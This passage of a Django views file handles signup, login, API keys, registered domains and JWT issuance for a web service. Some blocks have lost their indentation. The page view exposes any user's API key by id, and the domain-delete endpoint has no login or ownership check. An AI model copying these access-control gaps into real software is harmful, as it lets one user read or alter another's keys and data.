if form.is_valid():
form.save()
else:
form = UserCreationForm()
context.update({'form': form})
return render(request, 'main/pages/signup.html', context)
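# A hedged sketch of exercising the AJAX signup path above with Django's test
# client. The URL name 'main:user_signup' and the payload values are
# assumptions for illustration; adjust them to match this project's urls.py.
def _demo_signup_request():
    from django.test import Client
    from django.urls import reverse
    client = Client()
    payload = {'email': 'user@example.com', 'username': 'demo', 'password': 'a-strong-password'}
    response = client.post(
        reverse('main:user_signup'),             # assumed URL name
        data=json.dumps(payload),
        content_type='application/json',
        HTTP_X_REQUESTED_WITH='XMLHttpRequest',  # makes request.is_ajax() return True
    )
    return response.json()  # {'status': ..., 'msg': ...}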
def user_login(request):
    if request.is_ajax():
        response_data = {}
        data = json.loads(request.body.decode('utf-8'))
        postEmail = data.get('email')
        postPassword = data.get('password')
        try:
            user = authenticate(email=postEmail, password=postPassword)
        except Exception:
            # authenticate() normally returns None on failure; this only
            # guards against unexpected authentication-backend errors.
            response_data.update({'error': 'no user'})
            return JsonResponse(response_data)
        if user is not None and user.is_active:
            login(request, user)
            response_data.update({'status': 'success'})
        else:
            # Bad credentials or an inactive account.
            response_data.update({'error': 'no user'})
        return JsonResponse(response_data)
    # Non-AJAX requests get an empty JSON response.
    return JsonResponse({})
def user_logout(request):
logout(request)
return redirect('main:index')
@never_cache
@login_required
def user_mypage(request, id):
context = {
'userId': id
}
    u = get_object_or_404(User, id=id)
try:
a = ApiKey.objects.get(user=u)
d = Domain.objects.filter(api_key=a, is_removed=False)
except ObjectDoesNotExist:
a = None
d = None
context.update({
'api_key': a,
'domains': d
})
return render(request, 'main/pages/mypage.html', context)
@login_required
def apikey_new(request):
    if request.method == 'POST':
        ApiKey.objects.generate(request.user)
    # Redirect for both POST and GET so the view never returns None.
    return redirect('main:user_mypage', request.user.id)
@login_required
def domain_new(request):
    if request.method == 'POST':
        domain = request.POST.get('domain')
        parsed_domain = urlparse(domain)
        if parsed_domain.path[:9] == '127.0.0.1' or parsed_domain.path[:9] == 'localhost':
            post_domain = parsed_domain.path
        elif parsed_domain.netloc:
            post_domain = parsed_domain.netloc
            if post_domain[:4] == 'www.':
                post_domain = post_domain[4:]
        else:
            post_domain = parsed_domain.path
        # If the server can't extract a usable domain, stop here.
        if not post_domain:
            messages.add_message(request, messages.ERROR, 'Please enter a valid URL.')
            return redirect('main:user_mypage', request.user.id)
        try:
            a = ApiKey.objects.get(key=request.POST.get('api_key'))
        except ObjectDoesNotExist:
            messages.add_message(request, messages.ERROR, 'API key does not exist.')
            return redirect('main:user_mypage', request.user.id)
        # Check whether this user already registered the same domain.
        try:
            d = Domain.objects.get(domain=post_domain, api_key=a)
        except ObjectDoesNotExist:
            d = Domain(domain=post_domain, api_key=a)
            d.save()
        else:
            messages.add_message(request, messages.ERROR, 'This domain is already registered to your account.')
    return redirect('main:user_mypage', request.user.id)
def domain_delete(request):
    response_json = {}
    if request.is_ajax():
        data = json.loads(request.body.decode('utf-8'))
        domain_id = data.get('d_id')
        try:
            domain_instance = Domain.objects.get(id=domain_id)
        except ObjectDoesNotExist:
            response_json.update({
                'status': 'fail'
            })
            return JsonResponse(response_json)
        # Soft-delete: flag the domain instead of deleting the row.
        domain_instance.is_removed = True
        domain_instance.save()
        response_json.update({
            'status': 'success'
        })
    return JsonResponse(response_json)
@login_required
def secret_key_new(request, key):
    # Regenerate the secret only for a key owned by the requesting user.
    a = get_object_or_404(ApiKey, key=key, user=request.user)
    a.secret_key = ApiKey.objects.generate_secret()
    a.save()
    return redirect('main:user_mypage', request.user.id)
@csrf_exempt
def jwt_new(request):
    # Guard against non-POST requests, which carry no JSON body.
    if request.method != 'POST':
        return JsonResponse({'error': 'POST required.'}, status=405)
    data = json.loads(request.body.decode('utf-8'))
api_key = data.get('api-key')
secret = data.get('secret-key')
exp = data.get('exp')
nbf = data.get('nbf')
if not exp:
exp = datetime.datetime.utcnow() + datetime.timedelta(days=30)
if not nbf:
nbf = datetime.datetime.utcnow()
a = get_object_or_404(ApiKey, key=api_key)
    if a.secret_key == secret:
        encoded = jwt.encode({
            'api-key': api_key,
            'exp': exp,
            'nbf': nbf
        }, secret, algorithm='HS256')
        # PyJWT < 2.0 returns bytes, PyJWT >= 2.0 returns str.
        token = encoded.decode('utf-8') if isinstance(encoded, bytes) else encoded
        return JsonResponse({'jwt': token})
    else:
        return JsonResponse({'error': 'Invalid secret key.'})
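# Hedged companion sketch: how a holder of the secret key would verify a token
# issued by jwt_new above. PyJWT validates 'exp' and 'nbf' automatically while
# decoding; the function and variable names here are illustrative only.
def _demo_verify_jwt(token, secret_key):
    try:
        claims = jwt.decode(token, secret_key, algorithms=['HS256'])
    except jwt.InvalidTokenError:
        # Covers expired, not-yet-valid, or tampered tokens.
        return None
    return claims.get('api-key')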
def downloads(request):
return render(request, 'main/pages/downloads.html')